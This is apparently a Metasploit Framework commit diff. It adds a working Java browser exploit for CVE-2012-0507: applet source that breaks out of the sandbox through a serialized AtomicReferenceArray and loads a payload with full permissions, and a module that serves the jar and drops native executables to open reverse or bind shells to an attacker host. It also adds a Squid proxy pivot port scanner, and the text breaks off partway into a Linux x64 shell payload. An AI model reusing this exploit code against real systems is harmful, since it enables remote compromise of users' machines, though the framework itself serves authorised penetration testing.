diff --git a/data/armitage/armitage.jar b/data/armitage/armitage.jar index 02e92a3125..52adf6076e 100755 Binary files a/data/armitage/armitage.jar and b/data/armitage/armitage.jar differ diff --git a/data/armitage/whatsnew.txt b/data/armitage/whatsnew.txt index cd74d40620..dabb20e00c 100755 --- a/data/armitage/whatsnew.txt +++ b/data/armitage/whatsnew.txt @@ -1,6 +1,11 @@ Armitage Changelog ================== +29 Mar 12 +--------- +- Fixed a bug that affects first-time users. Armitage was not initializing a + console before trying to connect to the database. + 28 Mar 12 --------- - Team server now delivers chat messages in batches vs. one line at a time. diff --git a/data/exploits/CVE-2012-0507.jar b/data/exploits/CVE-2012-0507.jar new file mode 100644 index 0000000000..e0c2d68188 Binary files /dev/null and b/data/exploits/CVE-2012-0507.jar differ diff --git a/external/source/exploits/CVE-2012-0507/Exploit.java b/external/source/exploits/CVE-2012-0507/Exploit.java new file mode 100644 index 0000000000..3a1f899b9e --- /dev/null +++ b/external/source/exploits/CVE-2012-0507/Exploit.java @@ -0,0 +1,58 @@ +package a; + +import java.applet.Applet; +import java.io.ByteArrayInputStream; +import java.io.ObjectInputStream; +import java.util.concurrent.atomic.AtomicReferenceArray; +import a.*; + +// Referenced classes of package a: +// Help + +public class Exploit extends Applet +{ + + public Exploit() + { + } + + public static byte[] StringToBytes(String s) + { + byte abyte0[] = new byte[s.length() / 2]; + for(int i = 0; i < s.length(); i += 2) + abyte0[i / 2] = (byte)((Character.digit(s.charAt(i), 16) << 4) + Character.digit(s.charAt(i + 1), 16)); + + return abyte0; + } + + public void init() + { + try + { + String as[] = { + "ACED0005757200135B4C6A6176612E6C616E672E4F62", "6A6563743B90CE589F1073296C020000787000000002", "757200095B4C612E48656C703BFE2C941188B6E5FF02", "000078700000000170737200306A6176612E7574696C", "2E636F6E63757272656E742E61746F6D69632E41746F", "6D69635265666572656E63654172726179A9D2DEA1BE", "65600C0200015B000561727261797400135B4C6A6176", "612F6C616E672F4F626A6563743B787071007E0003" + }; + StringBuilder stringbuilder = new StringBuilder(); + for(int i = 0; i < as.length; i++) + stringbuilder.append(as[i]); + + ObjectInputStream objectinputstream = new ObjectInputStream(new ByteArrayInputStream(StringToBytes(stringbuilder.toString()))); + Object aobj[] = (Object[])(Object[])objectinputstream.readObject(); + Help ahelp[] = (Help[])(Help[])aobj[0]; + AtomicReferenceArray atomicreferencearray = (AtomicReferenceArray)aobj[1]; + ClassLoader classloader = getClass().getClassLoader(); + atomicreferencearray.set(0, classloader); + Help _tmp = ahelp[0]; + + String data = getParameter( "data" ); + String jar = getParameter( "jar" ); + String lhost = getParameter( "lhost" ); + String lport = getParameter( "lport" ); + System.out.println("go go go"); + Help.doWork(ahelp[0], this, data, jar, lhost, ( lport == null ? 4444 : Integer.parseInt( lport ) )); + } + catch(Exception exception) { + System.out.println(exception.getMessage()); + } + } +} diff --git a/external/source/exploits/CVE-2012-0507/Help.java b/external/source/exploits/CVE-2012-0507/Help.java new file mode 100644 index 0000000000..f340a77161 --- /dev/null +++ b/external/source/exploits/CVE-2012-0507/Help.java @@ -0,0 +1,82 @@ +package a; + +import java.io.ByteArrayOutputStream; +import java.io.IOException; +import java.io.InputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.io.Serializable; +import java.net.URL; +import java.security.AllPermission; +import java.security.CodeSource; +import java.security.Permissions; +import java.security.ProtectionDomain; +import java.security.cert.Certificate; +import java.lang.reflect.Field; + +public class Help extends ClassLoader implements Serializable{ + public static void doWork(Help h, Exploit expl, String data, String jar, String lhost, int lport) { + + String classNames[] = { "msf.x.PayloadX$StreamConnector", "msf.x.PayloadX" }; + String classPaths[] = { "/msf/x/PayloadX$StreamConnector.class", "/msf/x/PayloadX.class" }; + Class cls = null; + + try + { + for( int index=0 ; index 0 ) + bos.write( buffer, 0, length ); + // convert it to a simple byte array + buffer = bos.toByteArray(); + + URL url = new URL( "file:///" ); + + Certificate[] certs = new Certificate[0]; + + Permissions perm = new Permissions(); + perm.add( new AllPermission() ); + + ProtectionDomain pd = new ProtectionDomain( new CodeSource( url, certs ), perm ); + + cls = h.defineClass( classNames[index], buffer, 0, buffer.length, pd ); + Class class_cls = cls.getClass(); + System.out.println("The type of the object is: " + class_cls.getName()); + } + + // cls will end up being the PayloadX class + if( cls != null ) + { + // reflect into the PayloadX class to get these three fields + Field payload_data = cls.getField( "data" ); + Field payload_jar = cls.getField( "jar" ); + Field payload_lhost = cls.getField( "lhost" ); + Field payload_lport = cls.getField( "lport" ); + + // instantiate the PayloadX object once so as we can set the native payload data + Object obj = cls.newInstance(); + + // set the native payload data, lhost and lport + payload_data.set( obj, data ); + payload_jar.set( obj, jar ); + payload_lhost.set( obj, lhost ); + payload_lport.setInt( obj, lport ); + + // instantiate a second PayloadX object to perform the actual payload + obj = cls.newInstance(); + } + } + catch( Exception e ) { + System.out.println(e.getMessage()); + } + } +} + diff --git a/lib/msf/base/simple/payload.rb b/lib/msf/base/simple/payload.rb index 05fdc18934..b9f4f1e785 100644 --- a/lib/msf/base/simple/payload.rb +++ b/lib/msf/base/simple/payload.rb @@ -74,6 +74,10 @@ module Payload len = e.encoded.length + if arch.index(ARCH_JAVA) and fmt == 'war' + return e.encoded_war.pack + end + output = Msf::Util::EXE.to_executable_fmt(framework, arch, plat, e.encoded, fmt, exeopts) if not output diff --git a/lib/msf/core/payload.rb b/lib/msf/core/payload.rb index 7610cc2164..45a7bf75ed 100644 --- a/lib/msf/core/payload.rb +++ b/lib/msf/core/payload.rb @@ -528,11 +528,17 @@ protected end # Assemble the payload from the assembly - sc = Metasm::Shellcode.assemble(Metasm::Ia32.new, asm).encoded + cpu = case module_info['Arch'] + when ARCH_X86 then Metasm::Ia32.new + when ARCH_X86_64 then Metasm::X86_64.new + when ARCH_PPC then Metasm::PowerPC.new + when ARCH_ARMLE then Metasm::ARM.new + end + sc = Metasm::Shellcode.assemble(cpu, asm).encoded # Calculate the actual offsets now that it's been built off.each_pair { |option, val| - off[option] = [ sc.offset_of_reloc(option), val[1] ] + off[option] = [ sc.offset_of_reloc(option) || val[0], val[1] ] } # Cache the payload blob diff --git a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb new file mode 100644 index 0000000000..03fd0493d8 --- /dev/null +++ b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb @@ -0,0 +1,135 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex/socket/range_walker' + +class Metasploit3 < Msf::Auxiliary + + # Exploit mixins should be called first + include Msf::Exploit::Remote::HttpClient + # Scanner mixin should be near last + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize + super( + 'Name' => 'Squid Proxy Port Scanner', + 'Description' => %q{ + A misconfigured Squid proxy can allow an attacker to make requests on their behalf. + This may give the attacker information about devices that they cannot reach but the + Squid proxy can. For example, an attacker can make requests for internal IP addresses + against a misconfigurated open Squid proxy exposed to the Internet therefore performing + an internal port scan. The error messages returned by the proxy are used to determine + if the port is open or not. Many Squid proxies use custom error codes so your mileage + may vary. The open_proxy module can be used to test for open proxies though a Squid proxy + does not have to be open in order to allow for pivoting (e.g. an Intranet Squid proxy which allows + the attack to pivot to another part of the network). + }, + 'Author' => ['willis'], + 'Version' => '$Revision$', + 'References' => + [ + 'URL','http://wiki.squid-cache.org/SquidFaq/SecurityPitfalls' + ], + + 'License' => MSF_LICENSE + ) + + register_options( + [ + OptString.new('RANGE', [true, "IPs to scan through Squid proxy", '']), + OptString.new('PORTS', [true, "Ports to scan; must be TCP", "21,80,139,443,445,1433,1521,1723,3389,8080,9100"]), + OptBool.new('MANUAL_CHECK',[true,"Stop the scan if server seems to answer positively to every request",true]), + OptString.new('CANARY_IP',[true,"The IP to check if the proxy always answers positively; the IP should not respond.","1.2.3.4"]) + ], self.class) + + end + + def run_host(target_host) + + begin + iplist = Rex::Socket::RangeWalker.new(datastore['RANGE']) + dead = false + portlist = Rex::Socket.portspec_crack(datastore['PORTS']) + + vprint_status("[#{rhost}] Verifying manual testing is not required...") + + manual = false + #request a non-existent page first to make sure the server doesn't respond with a 200 to everything. + res_test = send_request_cgi({ + 'uri' => "http://{datastore['CANARY_IP']}:80", + 'method' => 'GET', + 'data' => '', + 'version' => '1.0', + 'vhost' => '' + }, 10) + + if res_test and res_test.body and (res_test.code == 200) + print_error("#{rhost} likely answers positively to every request, check it manually.") + print_error("\t\t Proceeding with the scan may increase false positives.") + manual = true + end + + + iplist.each do |target| + next if manual and datastore['MANUAL_CHECK'] + + portlist.each do |port| + next if dead + + vprint_status("[#{rhost}] Requesting #{target}:#{port}") + if port==443 + res = send_request_cgi({ + 'uri' => "https://#{target}:#{port}", + 'method' => 'GET', + 'data' => '', + 'version' => '1.0', + 'vhost' => '' + }, 10) + else + res = send_request_cgi({ + 'uri' => "http://#{target}:#{port}", + 'method' => 'GET', + 'data' => '', + 'version' => '1.0', + 'vhost' => '' + }, 10) + end + + if res and res.body + + if res.code == 200 or res.body =~ /Zero/ or res.code == 404 or res.code == 401 + print_good("[#{rhost}] #{target}:#{port} seems OPEN") + report_service(:host => target, :port => port, :name => "unknown", :info => res.body ) + end + if res.body =~ /No route to host/ + dead = true + print_error("[#{rhost}] #{target} is DEAD") + end + + print_status("[#{rhost}] #{target}:#{port} blocked by ACL") if res.body =~ /Access control/ + + if res.body =~ /Connection refused/ or res.body =~ /service not listening/ + report_host(:host => target) + print_good("[#{rhost}] #{target} is alive but #{port} is CLOSED") + end + end + end + dead = false + end + + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + rescue ::Timeout::Error, ::Errno::EPIPE + + end + end +end diff --git a/modules/exploits/multi/browser/java_atomicreferencearray.rb b/modules/exploits/multi/browser/java_atomicreferencearray.rb new file mode 100644 index 0000000000..1ce83d4457 --- /dev/null +++ b/modules/exploits/multi/browser/java_atomicreferencearray.rb @@ -0,0 +1,173 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' +require 'rex' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::EXE + + def initialize( info = {} ) + + super( update_info( info, + 'Name' => 'Java AtomicReferenceArray Type Violation Vulnerability', + 'Description' => %q{ + This module exploits a vulnerability due to the fact that + AtomicReferenceArray uses the Unsafe class to store a reference in an + array directly, which may violate type safety if not used properly. + This allows a way to escape the JRE sandbox, and load additional classes + in order to perform malicious operations. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'sinn3r', # metasploit module + 'juan vazquez' # metasploit module + ], + 'References' => + [ + ['CVE', '2012-0507'], + ['BID', '52161'], + ['URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3'], + ['URL', 'http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx'], + ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0507'] + ], + 'Platform' => [ 'java', 'win', 'osx', 'linux', 'solaris' ], + 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, + 'Targets' => + [ + [ 'Generic (Java Payload)', + { + 'Platform' => ['java'], + 'Arch' => ARCH_JAVA, + } + ], + [ 'Windows x86 (Native Payload)', + { + 'Platform' => 'win', + 'Arch' => ARCH_X86, + } + ], + [ 'Mac OS X PPC (Native Payload)', + { + 'Platform' => 'osx', + 'Arch' => ARCH_PPC, + } + ], + [ 'Mac OS X x86 (Native Payload)', + { + 'Platform' => 'osx', + 'Arch' => ARCH_X86, + } + ], + [ 'Linux x86 (Native Payload)', + { + 'Platform' => 'linux', + 'Arch' => ARCH_X86, + } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 14 2012' + )) + end + + + def exploit + # load the static jar file + path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-0507.jar" ) + fd = File.open( path, "rb" ) + @jar_data = fd.read(fd.stat.size) + fd.close + + super + end + + + def on_request_uri( cli, request ) + data = nil + host = nil + port = nil + peer = "#{cli.peerhost}:#{cli.peerport}" + + if not request.uri.match(/\.jar$/i) + if not request.uri.match(/\/$/) + send_redirect( cli, get_resource() + '/', '') + return + end + + print_status("#{peer} - Sending #{self.name}") + + payload = regenerate_payload( cli ) + if not payload + print_error("#{peer} - Failed to generate the payload." ) + return + end + + if target.name == 'Generic (Java Payload)' + if datastore['LHOST'] + jar = payload.encoded + host = datastore['LHOST'] + port = datastore['LPORT'] + vprint_status("Java reverse shell to #{host}:#{port} from #{peer}" ) + else + port = datastore['LPORT'] + datastore['RHOST'] = cli.peerhost + vprint_status( "Java bind shell on #{cli.peerhost}:#{port}..." ) + end + if jar + print_status( "Generated jar to drop (#{jar.length} bytes)." ) + jar = Rex::Text.to_hex( jar, prefix="" ) + else + print_error("#{peer} - Failed to generate the executable." ) + return + end + else + + # NOTE: The EXE mixin automagically handles detection of arch/platform + data = generate_payload_exe + + if data + print_status("#{peer} - Generated executable to drop (#{data.length} bytes)." ) + data = Rex::Text.to_hex( data, prefix="" ) + else + print_error("#{peer} - Failed to generate the executable." ) + return + end + + end + + send_response_html( cli, generate_html( data, jar, host, port ), { 'Content-Type' => 'text/html' } ) + return + end + + print_status( "#{peer} - sending jar to ..." ) + send_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } ) + + handler( cli ) + end + + def generate_html( data, jar, host, port ) + html = "" + html += "" + html += "" + html += "" if data + html += "" if jar + html += "" if host + html += "" if port + html += "" + return html + end + + def generate_jar() + return @jar_data + end + +end diff --git a/modules/payloads/singles/linux/x64/shell_find_port.rb b/modules/payloads/singles/linux/x64/shell_find_port.rb new file mode 100644 index 0000000000..5b574a07d7 --- /dev/null +++ b/modules/payloads/singles/linux/x64/shell_find_port.rb @@ -0,0 +1,87 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'msf/core/handler/find_port' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Payload::Linux + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Linux Command Shell, Find Port Inline', + 'Version' => '$Revision$', + 'Description' => 'Spawn a shell on an established connection', + 'Author' => 'mak', + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Arch' => ARCH_X86_64, + 'Handler' => Msf::Handler::FindPort, + 'Session' => Msf::Sessions::CommandShellUnix, + 'Payload' => + { + 'Offsets' => + { + 'CPORT' => [ 32, 'n' ], + }, + + 'Assembly' => <